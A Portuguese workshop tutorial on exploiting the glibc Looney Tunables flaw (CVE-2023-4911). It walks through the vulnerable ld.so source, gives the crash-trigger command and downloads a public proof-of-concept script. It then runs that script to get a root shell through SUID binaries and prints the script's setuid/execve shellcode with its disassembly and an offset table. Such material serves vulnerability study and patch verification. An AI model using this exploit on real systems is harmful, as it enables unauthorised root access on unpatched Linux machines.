Workshop de escalonamento de privilégios locais Looney Tunables (CVE-2023-4911) (apenas para fins educacionais)
Na computação, um vinculador dinâmico é a parte de um sistema operacional que carrega e vincula as bibliotecas compartilhadas necessárias para um executável quando ele é executado, copiando o conteúdo das bibliotecas do armazenamento persistente para a RAM, preenchendo tabelas de salto e realocando ponteiros.
Por exemplo, temos um programa que usa a biblioteca openssl para calcular o hash md5:
$ head md5_hash.c
#include <stdio.h>
#include <string.h>
#include <openssl/md5.h>
ld.so analisa o binário e tenta encontrar a biblioteca relacionada a <openssl/md5.h>
$ ldd md5_hash
linux-vdso.so.1 (0x00007fffa530b000)
libcrypto.so.3 => /lib/x86_64-linux-gnu/libcrypto.so.3 (0x00007f19cda00000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f19cd81e000)
/lib64/ld-linux-x86-64.so.2 (0x00007f19ce032000)
Como podemos ver, ele encontra a biblioteca criptográfica necessária em /lib/x86_64-linux-gnu/libcrypto.so.3 Durante a inicialização do programa, ele coloca o código desta biblioteca na RAM do processo e vincula todas as referências a esta biblioteca.
Quando um programa é iniciado, este carregador primeiro examina o programa para determinar as bibliotecas compartilhadas necessárias. Em seguida, ele procura essas bibliotecas, carrega-as na memória e vincula-as ao executável em tempo de execução. No processo, o carregador dinâmico resolve referências de símbolos, como referências de funções e variáveis, garantindo que tudo esteja configurado para a execução do programa. Dada a sua função, o carregador dinâmico é altamente sensível à segurança, pois seu código é executado com privilégios elevados quando um usuário local inicia um programa set-user-ID ou set-group-ID.
Tunables são um recurso da Biblioteca GNU C que permite que autores de aplicativos e mantenedores de distribuição alterem o comportamento da biblioteca de tempo de execução para corresponder à sua carga de trabalho. Eles são implementados como um conjunto de opções que podem ser modificadas de diferentes maneiras. O método padrão atual para fazer isso é por meio da variável de ambiente GLIBC_TUNABLES, configurando-a como uma sequência de pares nome=valor separados por dois pontos. Por exemplo, o exemplo a seguir ativa a verificação de malloc e define o limite de corte de malloc para 128 bytes:
GLIBC_TUNABLES=glibc.malloc.trim_threshold=128:glibc.malloc.check=3
export GLIBC_TUNABLES
Passando --list-tunables para o carregador dinâmico para imprimir todos os ajustáveis com valores mínimos e máximos:
$ /lib64/ld-linux-x86-64.so.2 --list-tunables
glibc.rtld.nns: 0x4 (min: 0x1, max: 0x10)
glibc.elision.skip_lock_after_retries: 3 (min: 0, max: 2147483647)
glibc.malloc.trim_threshold: 0x0 (min: 0x0, max: 0xffffffffffffffff)
glibc.malloc.perturb: 0 (min: 0, max: 255)
glibc.cpu.x86_shared_cache_size: 0x100000 (min: 0x0, max: 0xffffffffffffffff)
glibc.pthread.rseq: 1 (min: 0, max: 1)
glibc.cpu.prefer_map_32bit_exec: 0 (min: 0, max: 1)
glibc.mem.tagging: 0 (min: 0, max: 255)
Logo no início de sua execução, ld.so chama __tunables_init() para percorrer o ambiente (na linha 279), procurando por variáveis GLIBC_TUNABLES (na linha 282); para cada GLIBC_TUNABLES que encontra, ele faz uma cópia desta variável (na linha 284), chama parse_tunables() para processar e higienizar esta cópia (na linha 286) e, finalmente, substitui o GLIBC_TUNABLES original por esta cópia higienizada (na linha 288 ):
// (GLIBC ld.so sources in ./glibc-2.37/elf/dl-tunables.c)
269 void
270 __tunables_init ( char * * envp )
271 {
272 char * envname = NULL ;
273 char * envval = NULL ;
274 size_t len = 0 ;
275 char * * prev_envp = envp ;
...
279 while (( envp = get_next_env ( envp , & envname , & len , & envval ,
280 & prev_envp )) != NULL )
281 {
282 if ( tunable_is_name ( "GLIBC_TUNABLES" , envname )) // searching for GLIBC_TUNABLES variables
283 {
284 char * new_env = tunables_strdup ( envname );
285 if ( new_env != NULL )
286 parse_tunables ( new_env + len + 1 , envval ); //
287 /* Put in the updated envval. */
288 * prev_envp = new_env ;
289 continue ;
290 } O primeiro argumento de parse_tunables() (tunestr) aponta para a cópia de GLIBC_TUNABLES que será higienizada em breve, enquanto o segundo argumento (valstring) aponta para a variável de ambiente GLIBC_TUNABLES original (na pilha). Para limpar a cópia de GLIBC_TUNABLES (que deve estar no formato "tunable1= aaa:tunable2=bbb" ), parse_tunables() remove todos os ajustáveis perigosos (os ajustáveis SXID_ERASE) do tunestr, mas mantém os ajustáveis SXID_IGNORE e NONE (nas linhas 221- 235):
// (GLIBC ld.so sources in ./glibc-2.37/elf/dl-tunables.c)
162 static void
163 parse_tunables ( char * tunestr , char * valstring )
164 {
...
168 char * p = tunestr ;
169 size_t off = 0 ;
170
171 while (true)
172 {
173 char * name = p ;
174 size_t len = 0 ;
175
176 /* First, find where the name ends. */
177 while ( p [ len ] != '=' && p [ len ] != ':' && p [ len ] != '�' )
178 len ++ ;
179
180 /* If we reach the end of the string before getting a valid name-value
181 pair, bail out. */
182 if ( p [ len ] == '�' )
183 {
184 if ( __libc_enable_secure )
185 tunestr [ off ] = '�' ;
186 return ;
187 }
188
189 /* We did not find a valid name-value pair before encountering the
190 colon. */
191 if ( p [ len ] == ':' )
192 {
193 p += len + 1 ;
194 continue ;
195 }
196
197 p += len + 1 ;
198
199 /* Take the value from the valstring since we need to NULL terminate it. */
200 char * value = & valstring [ p - tunestr ];
201 len = 0 ;
202
203 while ( p [ len ] != ':' && p [ len ] != '�' )
204 len ++ ;
205
206 /* Add the tunable if it exists. */
207 for ( size_t i = 0 ; i < sizeof ( tunable_list ) / sizeof ( tunable_t ); i ++ )
208 {
209 tunable_t * cur = & tunable_list [ i ];
210
211 if ( tunable_is_name ( cur -> name , name ))
212 {
...
219 if ( __libc_enable_secure )
220 {
221 if ( cur -> security_level != TUNABLE_SECLEVEL_SXID_ERASE )
222 {
223 if ( off > 0 )
224 tunestr [ off ++ ] = ':' ;
225
226 const char * n = cur -> name ;
227
228 while ( * n != '�' )
229 tunestr [ off ++ ] = * n ++ ;
230
231 tunestr [ off ++ ] = '=' ;
232
233 for ( size_t j = 0 ; j < len ; j ++ )
234 tunestr [ off ++ ] = value [ j ];
235 }
236
237 if ( cur -> security_level != TUNABLE_SECLEVEL_NONE )
238 break ;
239 }
240
241 value [ len ] = '�' ;
242 tunable_initialize ( cur , value );
243 break ;
244 }
245 }
246
247 if ( p [ len ] != '�' )
248 p += len + 1 ;
249 }
250 }Infelizmente, se uma variável de ambiente GLIBC_TUNABLES estiver no formato "tunable1=tunable2=AAA" (onde "tunable1" e "tunable2" são ajustáveis SXID_IGNORE, por exemplo "glibc.malloc.mxfast"), então:
durante a primeira iteração do "while (true)" em parse_tunables(), todo o "tunable1=tunable2=AAA" é copiado no local para tunestr (nas linhas 221-235), preenchendo assim tunestr;
nas linhas 247-248, p não é incrementado (p[len] é '�' porque nenhum ':' foi encontrado nas linhas 203-204) e, portanto, p ainda aponta para o valor de "tunable1", ou seja, "tunable2= AAA";
durante a segunda iteração do "while (true)" em parse_tunables(), "tunable2=AAA" é anexado (como se fosse um segundo ajustável) ao tunestr (que já está cheio), transbordando assim o tunestr.
Comando:
$ env -i " GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A " " Z= ` printf ' %08192x ' 1 ` " /usr/bin/su --help
Segmentation fault (core dumped)Carga útil:
GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A Z=000000000000000000000000000000000000000000000000000000000000000000000000000000000000<SNIP>00000000000000000001
Comprimento -> 8236 bytes
Esta vulnerabilidade é um estouro de buffer simples, mas o que devemos substituir para obter a execução arbitrária de código? O buffer que estouramos é alocado na linha 284 por tunables_strdup(), uma reimplementação de strdup() que usa __minimal_malloc() do ld.so em vez do malloc() da glibc (na verdade, o malloc() da glibc ainda não foi inicializado ). Esta implementação de __minimal_malloc() simplesmente chama mmap() para obter mais memória do kernel.
Vamos dar uma olhada neste código:
56 struct link_map *
57 _dl_new_object ( char * realname , const char * libname , int type ,
58 struct link_map * loader , int mode , Lmid_t nsid )
59 {
..
84 struct link_map * new ;
85 struct libname_list * newname ;
..
92 new = ( struct link_map * ) calloc ( sizeof ( * new ) + audit_space
93 + sizeof ( struct link_map * )
94 + sizeof ( * newname ) + libname_len , 1 );
95 if ( new == NULL )
96 return NULL ;
97
98 new -> l_real = new ;
99 new -> l_symbolic_searchlist . r_list = ( struct link_map * * ) (( char * ) ( new + 1 )
100 + audit_space );
101
102 new -> l_libname = newname
103 = ( struct libname_list * ) ( new -> l_symbolic_searchlist . r_list + 1 );
104 newname -> name = ( char * ) memcpy ( newname + 1 , libname , libname_len );
105 /* newname->next = NULL; We use calloc therefore not necessary. */ ld.so aloca a memória para esta estrutura link_map com calloc() e, portanto, não inicializa explicitamente vários de seus membros para zero; esta é uma otimização razoável. Como mencionado anteriormente, calloc() aqui não é o calloc() da glibc, mas o __minimal_calloc() do ld.so, que chama __minimal_malloc() sem inicializar explicitamente a memória e retorna a zero; esta também é uma otimização razoável, porque para todos os efeitos __minimal_malloc() sempre retorna um pedaço limpo de memória mmap(), que é garantido para ser inicializado em zero pelo kernel.
Infelizmente, o buffer overflow em parse_tunables() nos permite sobrescrever a memória limpa mmap() com bytes diferentes de zero, substituindo assim os ponteiros da estrutura link_map que será alocada em breve com valores não NULL. Isso nos permite quebrar completamente a lógica do ld.so, que assume que esses ponteiros são NULOS.
Percebemos que muitos outros ponteiros na estrutura link_map não são inicializados explicitamente como NULL; em particular, os ponteiros para estruturas Elf64_Dyn na matriz de ponteiros l_info[]. Entre eles,
l_info[DT_RPATH], o "caminho de pesquisa da biblioteca", imediatamente se destacou: se sobrescrevermos esse ponteiro e controlarmos para onde e para que ele aponta, podemos forçar ld.so a confiar em um diretório que possuímos e, portanto, para carregar nossa própria biblioteca libc.so.6 ou LD_PRELOAD deste diretório e executar código arbitrário (como root, se executarmos ld.so através de um programa SUID-root).
Para onde o
l_info[DT_RPATH]sobrescrito deve apontar? A resposta fácil para esta pergunta é: a pilha; mais precisamente, nossas strings de ambiente na pilha. No Linux, a pilha é aleatória em uma região de 16GB, e nossas strings de ambiente podem ocupar até 6MB (_STK_LIM / 4 * 3, no bprm_stack_limits() do kernel): após 16GB / 6MB = 2730 tentativas temos uma boa chance de adivinhar o endereço das strings do nosso ambiente (em nosso exploit, sempre sobrescrevemosl_info[DT_RPATH]por 0x7ffdfffff010, o centro da região da pilha aleatória). Em nossos testes, essa força bruta leva cerca de 30s no Debian e cerca de 5m no Ubuntu e Fedora (por causa de seus manipuladores automáticos de falhas, Apport e ABRT; não tentamos contornar essa lentidão).
Para onde o l_info[DT_RPATH] sobrescrito deve apontar? Em nossa exploração, simplesmente preenchemos nossos 6 MB de strings de ambiente com 0xfffffffffffffff8 (-8), porque em um deslocamento de -8B abaixo da tabela de strings da maioria dos programas raiz SUID, a string "x08" aparece: isso força ld.so confiar em um diretório relativo chamado "x08" (em nosso diretório de trabalho atual) e, portanto, nos permite carregar e executar nossa própria biblioteca libc.so.6 ou LD_PRELOAD a partir deste diretório, como raiz.
Esquema:
Estou usando meu antigo snapshot do Kali Linux para testar o PoC. Vamos verificar se é vulnerável:
[~/cve]$ env -i " GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A " " Z= ` printf ' %08192x ' 1 ` " /usr/bin/su --help
[1] 7995 segmentation fault env -i " GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A " /usr/bin/sTemos SIGSEGV, então nosso sistema está vulnerável a esse CVE LPE!
Vamos baixar o script PoC e testá-lo:
[~/cve]$ wget -q https://haxx.in/files/gnu-acme.py
[~/cve]$ python3 gnu-acme.py
$$$ glibc ld.so (CVE-2023-4911) exploit $$$
-- by blasty <[email protected]> --
[i] libc = /lib/x86_64-linux-gnu/libc.so.6
[i] suid target = /usr/bin/su, suid_args = ['--help']
[i] ld.so = /lib64/ld-linux-x86-64.so.2
[i] ld.so build id = e664396d7c25533074698a0695127259dbbf56f3
[i] __libc_start_main = 0x27700
[i] using hax path b'x08' at offset -8
[i] wrote patched libc.so.6
error: no target info found for build id e664396d7c25533074698a0695127259dbbf56f3
Então, nosso id de compilação ld.so não está na lista de alvos, vamos consertar isso! Desativar ASLR:
[~/cve]$ sudo bash -c " echo 0 > /proc/sys/kernel/randomize_va_space "Verifique novamente:
[~/cve]$ python3 gnu-acme.py
$$$ glibc ld.so (CVE-2023-4911) exploit $$$
-- by blasty <[email protected]> --
[i] libc = /lib/x86_64-linux-gnu/libc.so.6
[i] suid target = /usr/bin/su, suid_args = ['--help']
[i] ld.so = /lib64/ld-linux-x86-64.so.2
[i] ld.so build id = e664396d7c25533074698a0695127259dbbf56f3
[i] __libc_start_main = 0x27700
[i] using hax path b'x08' at offset -8
[i] wrote patched libc.so.6
[i] ASLR is not enabled, attempting to find usable offsets
[i] using stack addr 0x7fffffffe10c
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 561
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 562
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 563
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 564
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 565
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 566
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 567
found working offset for ld.so 'e664396d7c25533074698a0695127259dbbf56f3' -> 568
Portanto, nosso script POC encontra algum deslocamento útil, vamos adicionar nosso ID de construção ld.so e deslocamento ao script: Return ASLR:
[~/cve]$ sudo bash -c " echo 1 > /proc/sys/kernel/randomize_va_space "Vamos tentar o script PoC novamente:
[~/cve]$ python3 gnu-acme.py
$$$ glibc ld.so (CVE-2023-4911) exploit $$$
-- by blasty <[email protected]> --
[i] libc = /lib/x86_64-linux-gnu/libc.so.6
[i] suid target = /usr/bin/su, suid_args = ['--help']
[i] ld.so = /lib64/ld-linux-x86-64.so.2
[i] ld.so build id = e664396d7c25533074698a0695127259dbbf56f3
[i] __libc_start_main = 0x27700
[i] using hax path b'x08' at offset -8
[i] wrote patched libc.so.6
[i] using stack addr 0x7ffe1010100c
.........................................................................................................................................................................................................................................................................................................................................# ** ohh... looks like we got a shell? **
whoami
root
# id
uid=0(root)
Funciona!
Também está funcionando com outros arquivos SUID:
[~/cve]$ find /usr/bin/ -perm -u=s -type f 2> /dev/null
< SNIP >
/usr/bin/mount
< SNIP > [~/cve]$ python3 gnu-acme.py /usr/bin/mount --help
$$$ glibc ld.so (CVE-2023-4911) exploit $$$
-- by blasty <[email protected]> --
[i] libc = /lib/x86_64-linux-gnu/libc.so.6
[i] suid target = /usr/bin/mount, suid_args = ['--help']
[i] ld.so = /lib64/ld-linux-x86-64.so.2
[i] ld.so build id = e664396d7c25533074698a0695127259dbbf56f3
[i] __libc_start_main = 0x27700
[i] using hax path b'x08' at offset -8
[i] wrote patched libc.so.6
[i] using stack addr 0x7ffe10101009
....................................................................................................................................................................................................................................................................................................................................................................................................................................# ** ohh... looks like we got a shell? **
id
uid=0(root)
No início do script PoC temos o dicionário ARCH com algumas arquiteturas de processador (deixei apenas x86_64 conforme uso). Neste dicionário temos
# This code is written by blasty <[email protected]>, I just commented it to figure it out
# ORIGINAL POC SCRIPT -> https://haxx.in/files/gnu-acme.py
import binascii
# <SNIP>
from shutil import which
unhex = lambda v : binascii . unhexlify ( v . replace ( " " , "" ))
ARCH = {
"x86_64" : {
"shellcode" : unhex (
"31ff6a69580f0531ff6a6a580f056a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05"
), # MODIFIED: context.arch = 'amd64'; asm(shellcraft.setuid(0) + shellcraft.setgid(0) + shellcraft.sh()).hex()
"exitcode" : unhex ( "6a665f6a3c580f05" ), # asm(shellcraft.exit(0x66)).hex()
"stack_top" : 0x800000000000 ,
"stack_aslr_bits" : 30 , # https://www.researchgate.net/figure/Comparative-summary-of-bits-of-entropy_tbl3_334618410
}
}Desmontagem do Shellcode
0 : 31 ff xor edi , edi
2 : 6a 69 push 0x69
4 : 58 pop rax
5 : 0f 05 syscall
7 : 31 ff xor edi , edi
9 : 6a 6a push 0x6a
b: 58 pop rax
c: 0f 05 syscall
e: 6a 68 push 0x68
10 : 48 b8 2f 62 69 6e 2f 2f 2f 73 movabs rax , 0x732f2f2f6e69622f
1a: 50 push rax
1b : 48 89 e7 mov rdi , rsp
1e: 68 72 69 01 01 push 0x1016972
23 : 81 34 24 01 01 01 01 xor DWORD PTR [ rsp ], 0x1010101
2a: 31 f6 xor esi , esi
2c: 56 push rsi
2d: 6a 08 push 0x8
2f: 5e pop rsi
30 : 48 01 e6 add rsi , rsp
33 : 56 push rsi
34 : 48 89 e6 mov rsi , rsp
37 : 31 d2 xor edx , edx
39 : 6a 3b push 0x3b
3b: 58 pop rax
3c: 0f 05 syscallDesmontagem do código de saída
0 : 6a 66 push 0x66
2 : 5f pop rdi
3 : 6a 3c push 0x3c
5 : 58 pop rax
6 : 0f 05 syscallEm seguida, temos o dicionário com alvos (ld.so build id) e suas compensações de buffer overflow
TARGETS = {
"e664396d7c25533074698a0695127259dbbf56f3" : 568
}Então, há muitas funções que são nomeadas de acordo com o que fazem e principalmente podem ser substituídas por métodos da biblioteca pwntools. Portanto, não vejo sentido em discuti-los em detalhes, exceto alguns deles
